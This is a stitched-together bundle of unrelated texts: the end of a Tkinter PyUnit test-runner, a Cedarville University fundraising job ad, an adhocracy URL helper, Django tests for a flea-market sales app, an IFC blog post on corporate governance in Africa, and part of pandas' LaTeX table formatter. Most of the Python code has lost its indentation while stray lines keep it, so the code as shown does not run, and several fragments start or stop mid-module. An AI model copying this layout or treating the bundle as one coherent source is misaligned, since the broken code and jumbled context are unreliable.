tk.Label(window, text=tracebackText, justify=tk.LEFT).pack()
tk.Button(window, text="Close",
command=window.quit).pack(side=tk.BOTTOM)
window.bind('<Key-Return>', lambda e, w=window: w.quit())
window.mainloop()
window.destroy()
class ProgressBar(tk.Frame):
"""A simple progress bar that shows a percentage progress in
the given colour."""
def __init__(self, *args, **kwargs):
        tk.Frame.__init__(self, *args, **kwargs)
self.canvas = tk.Canvas(self, height='20', width='60',
background='white', borderwidth=3)
self.canvas.pack(fill=tk.X, expand=1)
self.rect = self.text = None
self.canvas.bind('<Configure>', self.paint)
self.setProgressFraction(0.0)
def setProgressFraction(self, fraction, color='blue'):
self.fraction = fraction
self.color = color
self.paint()
self.canvas.update_idletasks()
def paint(self, *args):
totalWidth = self.canvas.winfo_width()
width = int(self.fraction * float(totalWidth))
height = self.canvas.winfo_height()
if self.rect is not None: self.canvas.delete(self.rect)
if self.text is not None: self.canvas.delete(self.text)
self.rect = self.canvas.create_rectangle(0, 0, width, height,
fill=self.color)
percentString = "%3.0f%%" % (100.0 * self.fraction)
self.text = self.canvas.create_text(totalWidth/2, height/2,
anchor=tk.CENTER,
text=percentString)
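# Standalone usage sketch: the bar can be embedded in any Tk container and
# driven with a fraction in [0.0, 1.0]:
#
#     root = tk.Tk()
#     bar = ProgressBar(root, relief=tk.SUNKEN, borderwidth=2)
#     bar.pack(fill=tk.X, expand=1)
#     bar.setProgressFraction(0.42, 'green')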
def main(initialTestName=""):
root = tk.Tk()
root.title("PyUnit")
runner = TkTestRunner(root, initialTestName)
root.protocol('WM_DELETE_WINDOW', root.quit)
root.mainloop()
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
main(sys.argv[1])
else:
main()
|
Cedarville University is seeking to hire a Regional Director of Development to develop long-term relationships built on a firm understanding of each donor’s interests, passions, and values for the purpose of soliciting gifts for annual, capital, and endowment needs. This is a full-time, exempt position that reports to the Associate Vice President for Development.
All job applicants should be aware that Cedarville University is a private religious employer which holds specific doctrinal positions. All employees of Cedarville University must be in full agreement with the doctrinal positions of the University and agree to live by workplace lifestyle standards.
All official inquiries should be directed to Teresa Day, Director of Staffing Services. Applicants must agree with and be willing to abide by Cedarville University's doctrinal statement, community covenant, and general workplace standards.
This position is subject to the University's verification of credentials and other information required by law and Cedarville University policies, including the completion of a criminal history investigation. Cedarville University is an Equal Opportunity Employer.
CEDARVILLE UNIVERSITY, located in Cedarville, Ohio, is an accredited Baptist university of arts, sciences, professional, and graduate programs. As a Christ-centered learning community, the University is equipping students for lifelong leadership and service through an education marked by excellence and grounded in biblical truth. Home to 3,300 Christian students, Cedarville is known for its commitment to biblical integration, spiritual formation, cultural engagement, academic quality, worldwide ministry, and student satisfaction. Recognized by U.S. News & World Report, The Princeton Review, and Peterson’s Competitive Colleges as one of the Midwest's best institutions, the University consistently achieves top rankings at national academic competitions. Founded in 1887, the University has invested more than $100 million in academic facilities to provide modern learning environments, updated networking and technology, and a fully wireless 400-acre campus. More than 100 programs of study are taught by 200 full-time Christian faculty members. For more information about the University, please visit www.cedarville.edu. Except as provided below, qualified applicants are considered for all positions, and employees are treated without regard to race, gender, national origin, age, marital or veteran status, or disability, if such disability may be accommodated without undue hardship. The University, under various sections of Title VII of the Civil Rights Act of 1964 (as amended) and Title IX of the Education Amendments of 1972 (as amended), reserves the right to discriminate on the basis of religion, marital status or gender (with regard to certain positions) where the approved job description for a position indicates that the determination relates to a bona fide occupational qualification reasonably necessary to the normal operation of that particular position, or where the University can demonstrate that it is unable to reasonably accommodate an employee's religious observance or practice without undue hardship in the conduct of that position's responsibilities and activities. |
from pylons.i18n import _
from adhocracy.lib import cache
from adhocracy.lib.helpers import proposal_helper as proposal
from adhocracy.lib.helpers import url as _url
@cache.memoize('selection_url')
def url(selection, member=None, format='html', selection_page=False, **kwargs):
if member is None and format == 'html' and not selection_page:
anchor = "selection_%s" % selection.id
return proposal.url(selection.proposal, anchor=anchor)
url = proposal.url(selection.proposal, member='implementation')
url += "/" + str(selection.id)
return _url.append_member_and_format(url, member=member, format=format,
**kwargs)
@cache.memoize('selection_bc')
def bc_entity(selection):
bc = _url.link(_("Implementation"),
proposal.url(selection.proposal,
                                member=u'implementation'))
bc += _url.BREAD_SEP + _url.link(selection.page.title, url(selection))
return bc
def breadcrumbs(selection):
bc = _url.root()
if selection is not None:
bc = bc_entity(selection)
else:
bc += _("Implementation")
return bc
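# Usage sketch (assuming a Selection instance `sel`; the member name
# 'details' is hypothetical):
#
#     url(sel)                    # proposal page with '#selection_<id>' anchor
#     url(sel, member='details')  # .../implementation/<id>/details
#     breadcrumbs(sel)            # Implementation > <selection page title>
#     breadcrumbs(None)           # site root plus plain "Implementation"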
|
# -*- coding: utf-8 -*-
from http import HTTPStatus
from django.test import Client, TestCase
import faker
from .factories import *
from .api_access import Api
from . import ResultMixin
from ..models import Item, Receipt, ReceiptItem
__author__ = 'codez'
class PublicTest(TestCase, ResultMixin):
def setUp(self):
self.client = Client()
self.event = EventFactory()
self.vendor = VendorFactory(event=self.event)
self.type = ItemTypeFactory(event=self.event)
user = self.vendor.user
if not self.client.login(username=user.username, password=UserFactory.DEFAULT_PASSWORD):
raise RuntimeError("Could not log in.")
def test_register_item(self):
data = dict(
name=faker.Faker().sentence(nb_words=3),
price="1.25",
tag_type="short",
suffixes="",
item_type=self.type.id,
adult=False,
)
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/item/".format(self.event.slug),
data=data)).json()
self.assertEqual(1, len(result))
r_item = result[0]
self.assertEqual(self.vendor.id, r_item["vendor_id"])
def test_register_box(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=4,
bundle_size=1,
)
        # The endpoint actually returns an HTML page, so assert via the template context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
def test_register_box_with_single_item(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=1,
bundle_size=1,
)
        # The endpoint actually returns an HTML page, so assert via the template context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
def test_register_single_bundle_box(self):
data = dict(
description=faker.Faker().sentence(nb_words=3),
price="1.25",
item_type=self.type.id,
adult=False,
count=1,
bundle_size=2,
)
        # The endpoint actually returns an HTML page, so assert via the template context.
result = self.assertSuccess(self.client.post("/kirppu/{}/vendor/box/".format(self.event.slug), data=data))
self.assertEqual(data["description"], result.context["description"])
class StatesTest(TestCase, ResultMixin):
def setUp(self):
self.client = Client()
self.event = EventFactory()
self.vendor = VendorFactory(event=self.event)
self.items = ItemFactory.create_batch(10, vendor=self.vendor)
self.counter = CounterFactory(event=self.event)
self.clerk = ClerkFactory(event=self.event)
self.api = Api(client=self.client, event=self.event)
self.assertSuccess(self.api.clerk_login(code=self.clerk.get_code(), counter=self.counter.private_key))
def test_fail_reserve_without_receipt(self):
ret = self.api.item_reserve(code=self.items[0].code)
self.assertEqual(HTTPStatus.BAD_REQUEST, ret.status_code)
def test_normal_item_receipt(self):
item_code = self.items[0].code
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertSuccess(self.api.item_reserve(code=item_code))
db_item = Item.objects.get(code=item_code)
self.assertEqual(Item.STAGED, db_item.state)
finished_receipt = self.assertSuccess(self.api.receipt_finish(id=receipt["id"])).json()
db_item = Item.objects.get(code=item_code)
self.assertEqual(Item.SOLD, db_item.state)
self.assertEqual(Receipt.FINISHED, finished_receipt["status"])
def test_double_reservation(self):
# Note: This tests only two subsequent requests.
# Two simultaneous requests cannot be tested here as basic tests require sequential request/database access.
item_code = self.items[0].code
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertSuccess(self.api.item_reserve(code=item_code))
expected_failure = self.api.item_reserve(code=item_code)
self.assertEqual(HTTPStatus.LOCKED, expected_failure.status_code)
def test_normal_box_receipt(self):
box = BoxFactory(adopt=True, items=self.items)
box_checkin = self.assertResult(self.api.item_checkin(code=box.representative_item.code),
expect=HTTPStatus.ACCEPTED).json()
self.assertSuccess(self.api.box_checkin(code=box.representative_item.code,
box_info=box_checkin["box"]["box_number"]))
receipt = self.assertSuccess(self.api.receipt_start()).json()
reserve_count = 3
self.assertSuccess(self.api.box_item_reserve(box_number=box.box_number, box_item_count=reserve_count))
self.assertEqual(reserve_count, Item.objects.filter(box=box, state=Item.STAGED).count())
finished_receipt = self.assertSuccess(self.api.receipt_finish(id=receipt["id"])).json()
self.assertEqual(Receipt.FINISHED, finished_receipt["status"])
def test_box_over_reserve(self):
reserve_count = 3
box = BoxFactory(vendor=VendorFactory(event=self.event), item_count=reserve_count - 1)
box_checkin = self.assertResult(self.api.item_checkin(code=box.representative_item.code),
expect=HTTPStatus.ACCEPTED).json()
self.assertSuccess(self.api.box_checkin(code=box.representative_item.code,
box_info=box_checkin["box"]["box_number"]))
receipt = self.assertSuccess(self.api.receipt_start()).json()
self.assertResult(self.api.box_item_reserve(box_number=box.box_number, box_item_count=reserve_count),
expect=HTTPStatus.CONFLICT)
def test_box_return_receipt(self):
"""Reserving and releasing box items should avoid representative item,
as it is the one used to display item price.
Relevant when part of box items are sold, and price of rest of its items are changed."""
box = BoxFactory(adopt=True, items=self.items, box_number=1)
Item.objects.all().update(state=Item.BROUGHT)
representative_item_id = box.representative_item_id
receipt = self.assertSuccess(self.api.receipt_start()).json()
def check_count(n):
self.assertEqual(n, Item.objects.filter(state=Item.STAGED).count())
self.assertEqual(n, ReceiptItem.objects.filter(receipt__pk=receipt["id"], action=ReceiptItem.ADD).count())
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=4))
self.assertEqual(4, Item.objects.filter(state=Item.STAGED).count())
# Representative item should not be added to the receipt first.
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=2))
self.assertEqual(2, Item.objects.filter(state=Item.STAGED).count())
# Representative item should be first to be released.
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=8))
check_count(10)
self.assertEqual(Item.STAGED, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=1))
check_count(9)
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_reserve(box_number=1, box_item_count=1))
check_count(10)
self.assertEqual(Item.STAGED, Item.objects.get(pk=representative_item_id).state)
self.assertSuccess(self.api.box_item_release(box_number=1, box_item_count=2))
check_count(8)
self.assertEqual(Item.BROUGHT, Item.objects.get(pk=representative_item_id).state)
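# These cases use Django's standard test machinery, so they can be run with
# the project's manage.py (assuming the app is installed under the label
# "kirppu"):
#
#     python manage.py test kirppu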
|
In the run-up to the April 2017 implementation of the King IV Code on Corporate Governance for South Africa, there’s lots of talk about what it all means. From my perspective and experience working with companies, regulators and governments alike on ways to improve corporate governance, it all boils down to a change in one little word. But with this change comes big implications for companies.
The King IV Code requires listed companies both to apply the financial rules AND to explain the non-financial aspects of company operations. It replaces the King III Code requirement that companies either apply the financial reporting rules OR explain why they are not. The revised code obligates companies to go beyond boilerplate reporting about their financial status to reveal more about their operational context.
The implication is clear: South African companies need to get better fast in their approach to transparency and disclosure.
But I would argue that it’s not just an issue for South African companies. In Kenya, for example, IFC is advising the Capital Market Authority on implementing a new corporate governance code. The code places great emphasis on transparency and disclosure, with a particular focus on stakeholder relations, ethics and corporate responsibility.
Globally, there’s a strong push, led by investors and shareholders, for more detailed reporting on non-financial aspects of company operations. The reason? An increased level of disclosure, going beyond the balance sheet to span all aspects of operations, makes it harder to cover up ethics breaches, poor corporate citizenship, or other bad corporate behaviour. Best-in-class disclosure gives investors comfort. It can mitigate some of the risks inherent in emerging and frontier markets, where institutional oversight can be weak.
For companies in emerging markets, this better disclosure – including detail on safeguards to reduce the risk of ethics troubles – can be a differentiator as they compete for foreign investment. In addition, some studies have shown that increased disclosure and more detailed reporting can help lower companies’ cost of capital.
At IFC, our own commitment to heightened transparency and disclosure is embedded in our access to information policy. For our clients, we are responding to the growing global emphasis on transparency and disclosure with new tools that help companies enhance their non-financial reporting. We are also expanding the scope of our corporate governance advice, which falls within a comprehensive environmental, social and governance framework to address the broader range of ethical issues companies face in today’s complex world. It’s all part of our overarching mission to encourage investment in emerging markets, guided by performance standards that aim for a strong triple bottom line: solutions that are good for business, investors, and the local community and environment.
Unfortunately, though, there will always be bad actors. There will always be those in corporate positions of power with criminal intent in mind. There will always be the potential for ethical lapses – even if they are inadvertent or unintended.
That’s not to say that nothing can be done. Companies can take strong and decisive action to reduce these risks. They can demonstrate proactive efforts to safeguard their corporate integrity. In doing so, they will be better positioned to attract investment and thrive over the long term. Here are four steps African companies can take right now to ensure that their ethical houses are in order.
The arbiters of a company’s ethical behaviour are its wide range of stakeholders. These include employees, who may not have a say in how the company is run. However, even a perception of impropriety – and the ensuing damage to the company’s reputation – could have a profound impact on them and their families. Customers, too, play an important role. They can validate the company’s integrity by purchasing its products and services. In the event of inappropriate company behaviour, they can show their dissatisfaction by buying the competitor’s goods instead, with potentially disastrous revenue implications for the company.
The community at large also has a vested interest in the company, which has the potential to drive broader economic growth in the region. The community has power as well, bringing to bear a collective voice that is louder and stronger than ever, thanks to social media. Companies that behave badly – say, by sending untreated manufacturing waste into local waterways or by making false claims about their products – won’t go unnoticed for very long.
Much of the responsibility for ethical corporate behaviour lies with the company’s board of directors. The converse is true as well: a weak board is an open invitation for bad actors to perpetrate fraud or other criminal activity. In short, the board is the custodian of the company’s reputation – for better or for worse.
For this reason, a strong board, composed of a gender-diverse mix of directors who bring complementary skills and experience to the table, is a must. Independent directors with standing in the community or in their field are an important part of the mix. They bring objectivity and an outsider’s point of view, along with their good reputations, which can only benefit the board’s discussions and decision-making.
The conversation in African boardrooms today should be about putting into place robust safeguards to reduce the risk of ethical breaches. It starts with a clear statement from the board, indicating that the company has zero tolerance for fraud. The statement should include a plan for the what-if: what if evidence of fraud comes to light? It should stipulate the importance of the board’s role in stepping up, pushing for an investigation and announcing the results.
After defining the systems and processes that would guide an investigation, the company can test out the approach through frequent simulations. This will ensure that the anti-fraud mechanisms that were put in place remain relevant and effective. Such exercises demonstrate vigilance, putting potential fraudsters on notice that they will not be able to get away with their actions.
Conflicts of interest are bound to happen. The reality in many of Africa’s smaller markets – where there may be a limited number of suppliers and an even more limited number of players – is that it is next to impossible to avoid such conflicts. Take a related-party transaction, for example, in which a board director has a connection with a potential supplier. This can result in unfair market practices, such as preferential pricing or too favourable a deal in exchange for a non-compete contract.
If such conflicts can be avoided, they should be. But, in accepting the reality on the ground, the key is to establish a clear policy that defines how the company handles such conflicts when they arise. The policy should state that anyone who has a conflict of interest should disclose the conflict. They should step away from the situation at hand and recuse themselves from the discussion and the decision. Of course, it’s not enough to have a policy on paper. It needs to be enforced. And, it needs to be reported, rather than pretending it never happened.
Taking such actions now will position African companies well for the future. They will be better prepared to respond appropriately. And they will show that they have done all they can to reduce their business, ethics, governance and reputational risks, as the call for enhanced transparency and disclosure grows louder. |
"""
Module for formatting output data in Latex.
"""
from abc import ABC, abstractmethod
from typing import Iterator, List, Optional, Sequence, Tuple, Type, Union
import numpy as np
from pandas.core.dtypes.generic import ABCMultiIndex
from pandas.io.formats.format import DataFrameFormatter
def _split_into_full_short_caption(
caption: Optional[Union[str, Tuple[str, str]]]
) -> Tuple[str, str]:
"""Extract full and short captions from caption string/tuple.
Parameters
----------
caption : str or tuple, optional
Either table caption string or tuple (full_caption, short_caption).
If string is provided, then it is treated as table full caption,
while short_caption is considered an empty string.
Returns
-------
full_caption, short_caption : tuple
Tuple of full_caption, short_caption strings.
"""
if caption:
if isinstance(caption, str):
full_caption = caption
short_caption = ""
else:
try:
full_caption, short_caption = caption
except ValueError as err:
msg = "caption must be either a string or a tuple of two strings"
raise ValueError(msg) from err
else:
full_caption = ""
short_caption = ""
return full_caption, short_caption
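# Example behaviour for the three accepted inputs:
#
#     _split_into_full_short_caption(None)               # -> ("", "")
#     _split_into_full_short_caption("full")             # -> ("full", "")
#     _split_into_full_short_caption(("full", "short"))  # -> ("full", "short")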
class RowStringConverter(ABC):
r"""Converter for dataframe rows into LaTeX strings.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
multicolumn: bool, optional
Whether to use \multicolumn macro.
multicolumn_format: str, optional
Multicolumn format.
multirow: bool, optional
Whether to use \multirow macro.
"""
def __init__(
self,
formatter: DataFrameFormatter,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
):
self.fmt = formatter
self.frame = self.fmt.frame
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.clinebuf: List[List[int]] = []
self.strcols = self._get_strcols()
self.strrows = list(zip(*self.strcols))
def get_strrow(self, row_num: int) -> str:
"""Get string representation of the row."""
row = self.strrows[row_num]
is_multicol = (
row_num < self.column_levels and self.fmt.header and self.multicolumn
)
is_multirow = (
row_num >= self.header_levels
and self.fmt.index
and self.multirow
and self.index_levels > 1
)
is_cline_maybe_required = is_multirow and row_num < len(self.strrows) - 1
crow = self._preprocess_row(row)
if is_multicol:
crow = self._format_multicolumn(crow)
if is_multirow:
crow = self._format_multirow(crow, row_num)
lst = []
lst.append(" & ".join(crow))
lst.append(" \\\\")
if is_cline_maybe_required:
cline = self._compose_cline(row_num, len(self.strcols))
lst.append(cline)
return "".join(lst)
@property
def _header_row_num(self) -> int:
"""Number of rows in header."""
return self.header_levels if self.fmt.header else 0
@property
def index_levels(self) -> int:
"""Integer number of levels in index."""
return self.frame.index.nlevels
@property
def column_levels(self) -> int:
return self.frame.columns.nlevels
@property
def header_levels(self) -> int:
nlevels = self.column_levels
if self.fmt.has_index_names and self.fmt.show_index_names:
nlevels += 1
return nlevels
def _get_strcols(self) -> List[List[str]]:
"""String representation of the columns."""
if self.fmt.frame.empty:
strcols = [[self._empty_info_line]]
else:
strcols = self.fmt.get_strcols()
# reestablish the MultiIndex that has been joined by get_strcols()
if self.fmt.index and isinstance(self.frame.index, ABCMultiIndex):
out = self.frame.index.format(
adjoin=False,
sparsify=self.fmt.sparsify,
names=self.fmt.has_index_names,
na_rep=self.fmt.na_rep,
)
# index.format will sparsify repeated entries with empty strings
# so pad these with some empty space
def pad_empties(x):
for pad in reversed(x):
if pad:
break
return [x[0]] + [i if i else " " * len(pad) for i in x[1:]]
gen = (pad_empties(i) for i in out)
# Add empty spaces for each column level
clevels = self.frame.columns.nlevels
out = [[" " * len(i[-1])] * clevels + i for i in gen]
# Add the column names to the last index column
cnames = self.frame.columns.names
if any(cnames):
new_names = [i if i else "{}" for i in cnames]
out[self.frame.index.nlevels - 1][:clevels] = new_names
# Get rid of old multiindex column and add new ones
strcols = out + strcols[1:]
return strcols
@property
def _empty_info_line(self):
return (
f"Empty {type(self.frame).__name__}\n"
f"Columns: {self.frame.columns}\n"
f"Index: {self.frame.index}"
)
def _preprocess_row(self, row: Sequence[str]) -> List[str]:
"""Preprocess elements of the row."""
if self.fmt.escape:
crow = _escape_symbols(row)
else:
crow = [x if x else "{}" for x in row]
if self.fmt.bold_rows and self.fmt.index:
crow = _convert_to_bold(crow, self.index_levels)
return crow
def _format_multicolumn(self, row: List[str]) -> List[str]:
r"""
Combine columns belonging to a group to a single multicolumn entry
according to self.multicolumn_format
e.g.:
a & & & b & c &
will become
\multicolumn{3}{l}{a} & b & \multicolumn{2}{l}{c}
"""
row2 = row[: self.index_levels]
ncol = 1
coltext = ""
def append_col():
# write multicolumn if needed
if ncol > 1:
row2.append(
f"\\multicolumn{{{ncol:d}}}{{{self.multicolumn_format}}}"
f"{{{coltext.strip()}}}"
)
# don't modify where not needed
else:
row2.append(coltext)
for c in row[self.index_levels :]:
# if next col has text, write the previous
if c.strip():
if coltext:
append_col()
coltext = c
ncol = 1
# if not, add it to the previous multicolumn
else:
ncol += 1
# write last column name
if coltext:
append_col()
return row2
def _format_multirow(self, row: List[str], i: int) -> List[str]:
r"""
Check following rows, whether row should be a multirow
e.g.: becomes:
a & 0 & \multirow{2}{*}{a} & 0 &
& 1 & & 1 &
b & 0 & \cline{1-2}
b & 0 &
"""
for j in range(self.index_levels):
if row[j].strip():
nrow = 1
for r in self.strrows[i + 1 :]:
if not r[j].strip():
nrow += 1
else:
break
if nrow > 1:
# overwrite non-multirow entry
row[j] = f"\\multirow{{{nrow:d}}}{{*}}{{{row[j].strip()}}}"
# save when to end the current block with \cline
self.clinebuf.append([i + nrow - 1, j + 1])
return row
def _compose_cline(self, i: int, icol: int) -> str:
"""
Create clines after multirow-blocks are finished.
"""
lst = []
for cl in self.clinebuf:
if cl[0] == i:
lst.append(f"\n\\cline{{{cl[1]:d}-{icol:d}}}")
# remove entries that have been written to buffer
self.clinebuf = [x for x in self.clinebuf if x[0] != i]
return "".join(lst)
class RowStringIterator(RowStringConverter):
"""Iterator over rows of the header or the body of the table."""
@abstractmethod
def __iter__(self) -> Iterator[str]:
"""Iterate over LaTeX string representations of rows."""
class RowHeaderIterator(RowStringIterator):
"""Iterator for the table header rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num < self._header_row_num:
yield self.get_strrow(row_num)
class RowBodyIterator(RowStringIterator):
"""Iterator for the table body rows."""
def __iter__(self) -> Iterator[str]:
for row_num in range(len(self.strrows)):
if row_num >= self._header_row_num:
yield self.get_strrow(row_num)
class TableBuilderAbstract(ABC):
"""
Abstract table builder producing string representation of LaTeX table.
Parameters
----------
formatter : `DataFrameFormatter`
Instance of `DataFrameFormatter`.
column_format: str, optional
Column format, for example, 'rcl' for three columns.
multicolumn: bool, optional
Use multicolumn to enhance MultiIndex columns.
multicolumn_format: str, optional
The alignment for multicolumns, similar to column_format.
multirow: bool, optional
Use multirow to enhance MultiIndex rows.
caption: str, optional
Table caption.
short_caption: str, optional
Table short caption.
label: str, optional
LaTeX label.
position: str, optional
Float placement specifier, for example, 'htb'.
"""
def __init__(
self,
formatter: DataFrameFormatter,
column_format: Optional[str] = None,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
caption: Optional[str] = None,
short_caption: Optional[str] = None,
label: Optional[str] = None,
position: Optional[str] = None,
):
self.fmt = formatter
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption = caption
self.short_caption = short_caption
self.label = label
self.position = position
def get_result(self) -> str:
"""String representation of LaTeX table."""
elements = [
self.env_begin,
self.top_separator,
self.header,
self.middle_separator,
self.env_body,
self.bottom_separator,
self.env_end,
]
result = "\n".join([item for item in elements if item])
trailing_newline = "\n"
result += trailing_newline
return result
@property
@abstractmethod
def env_begin(self) -> str:
"""Beginning of the environment."""
@property
@abstractmethod
def top_separator(self) -> str:
"""Top level separator."""
@property
@abstractmethod
def header(self) -> str:
"""Header lines."""
@property
@abstractmethod
def middle_separator(self) -> str:
"""Middle level separator."""
@property
@abstractmethod
def env_body(self) -> str:
"""Environment body."""
@property
@abstractmethod
def bottom_separator(self) -> str:
"""Bottom level separator."""
@property
@abstractmethod
def env_end(self) -> str:
"""End of the environment."""
class GenericTableBuilder(TableBuilderAbstract):
"""Table builder producing string representation of LaTeX table."""
@property
def header(self) -> str:
iterator = self._create_row_iterator(over="header")
return "\n".join(list(iterator))
@property
def top_separator(self) -> str:
return "\\toprule"
@property
def middle_separator(self) -> str:
return "\\midrule" if self._is_separator_required() else ""
@property
def env_body(self) -> str:
iterator = self._create_row_iterator(over="body")
return "\n".join(list(iterator))
def _is_separator_required(self) -> bool:
return bool(self.header and self.env_body)
@property
def _position_macro(self) -> str:
r"""Position macro, extracted from self.position, like [h]."""
return f"[{self.position}]" if self.position else ""
@property
def _caption_macro(self) -> str:
r"""Caption macro, extracted from self.caption.
With short caption:
\caption[short_caption]{caption_string}.
Without short caption:
\caption{caption_string}.
"""
if self.caption:
return "".join(
[
r"\caption",
f"[{self.short_caption}]" if self.short_caption else "",
f"{{{self.caption}}}",
]
)
return ""
@property
def _label_macro(self) -> str:
r"""Label macro, extracted from self.label, like \label{ref}."""
return f"\\label{{{self.label}}}" if self.label else ""
def _create_row_iterator(self, over: str) -> RowStringIterator:
"""Create iterator over header or body of the table.
Parameters
----------
over : {'body', 'header'}
Over what to iterate.
Returns
-------
RowStringIterator
Iterator over body or header.
"""
iterator_kind = self._select_iterator(over)
return iterator_kind(
formatter=self.fmt,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
)
def _select_iterator(self, over: str) -> Type[RowStringIterator]:
"""Select proper iterator over table rows."""
if over == "header":
return RowHeaderIterator
elif over == "body":
return RowBodyIterator
else:
msg = f"'over' must be either 'header' or 'body', but {over} was provided"
raise ValueError(msg)
class LongTableBuilder(GenericTableBuilder):
"""Concrete table builder for longtable.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = LongTableBuilder(formatter, caption='a long table',
... label='tab:long', column_format='lrl')
>>> table = builder.get_result()
>>> print(table)
\\begin{longtable}{lrl}
\\caption{a long table}
\\label{tab:long}\\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endfirsthead
\\caption[]{a long table} \\\\
\\toprule
{} & a & b \\\\
\\midrule
\\endhead
\\midrule
\\multicolumn{3}{r}{{Continued on next page}} \\\\
\\midrule
\\endfoot
<BLANKLINE>
\\bottomrule
\\endlastfoot
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\end{longtable}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
first_row = (
f"\\begin{{longtable}}{self._position_macro}{{{self.column_format}}}"
)
elements = [first_row, f"{self._caption_and_label()}"]
return "\n".join([item for item in elements if item])
def _caption_and_label(self) -> str:
if self.caption or self.label:
double_backslash = "\\\\"
elements = [f"{self._caption_macro}", f"{self._label_macro}"]
caption_and_label = "\n".join([item for item in elements if item])
caption_and_label += double_backslash
return caption_and_label
else:
return ""
@property
def middle_separator(self) -> str:
iterator = self._create_row_iterator(over="header")
# the content between \endfirsthead and \endhead commands
# mitigates repeated List of Tables entries in the final LaTeX
# document when dealing with longtable environments; GH #34360
elements = [
"\\midrule",
"\\endfirsthead",
f"\\caption[]{{{self.caption}}} \\\\" if self.caption else "",
self.top_separator,
self.header,
"\\midrule",
"\\endhead",
"\\midrule",
f"\\multicolumn{{{len(iterator.strcols)}}}{{r}}"
"{{Continued on next page}} \\\\",
"\\midrule",
"\\endfoot\n",
"\\bottomrule",
"\\endlastfoot",
]
if self._is_separator_required():
return "\n".join(elements)
return ""
@property
def bottom_separator(self) -> str:
return ""
@property
def env_end(self) -> str:
return "\\end{longtable}"
class RegularTableBuilder(GenericTableBuilder):
"""Concrete table builder for regular table.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = RegularTableBuilder(formatter, caption='caption', label='lab',
... column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{table}
\\centering
\\caption{caption}
\\label{lab}
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
\\end{table}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
elements = [
f"\\begin{{table}}{self._position_macro}",
"\\centering",
f"{self._caption_macro}",
f"{self._label_macro}",
f"\\begin{{tabular}}{{{self.column_format}}}",
]
return "\n".join([item for item in elements if item])
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\n".join(["\\end{tabular}", "\\end{table}"])
class TabularBuilder(GenericTableBuilder):
"""Concrete table builder for tabular environment.
>>> from pandas import DataFrame
>>> from pandas.io.formats import format as fmt
>>> df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
>>> formatter = fmt.DataFrameFormatter(df)
>>> builder = TabularBuilder(formatter, column_format='lrc')
>>> table = builder.get_result()
>>> print(table)
\\begin{tabular}{lrc}
\\toprule
{} & a & b \\\\
\\midrule
0 & 1 & b1 \\\\
1 & 2 & b2 \\\\
\\bottomrule
\\end{tabular}
<BLANKLINE>
"""
@property
def env_begin(self) -> str:
return f"\\begin{{tabular}}{{{self.column_format}}}"
@property
def bottom_separator(self) -> str:
return "\\bottomrule"
@property
def env_end(self) -> str:
return "\\end{tabular}"
class LatexFormatter:
r"""
Used to render a DataFrame to a LaTeX tabular/longtable environment output.
Parameters
----------
formatter : `DataFrameFormatter`
longtable : bool, default False
Use longtable environment.
column_format : str, default None
The columns format as specified in `LaTeX table format
        <https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g. 'rcl' for 3 columns
multicolumn : bool, default False
Use \multicolumn to enhance MultiIndex columns.
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
multirow : bool, default False
Use \multirow to enhance MultiIndex rows.
caption : str or tuple, optional
Tuple (full_caption, short_caption),
which results in \caption[short_caption]{full_caption};
if a single string is passed, no short caption will be set.
label : str, optional
The LaTeX label to be placed inside ``\label{}`` in the output.
position : str, optional
The LaTeX positional argument for tables, to be placed after
``\begin{}`` in the output.
See Also
--------
HTMLFormatter
"""
def __init__(
self,
formatter: DataFrameFormatter,
longtable: bool = False,
column_format: Optional[str] = None,
multicolumn: bool = False,
multicolumn_format: Optional[str] = None,
multirow: bool = False,
caption: Optional[Union[str, Tuple[str, str]]] = None,
label: Optional[str] = None,
position: Optional[str] = None,
):
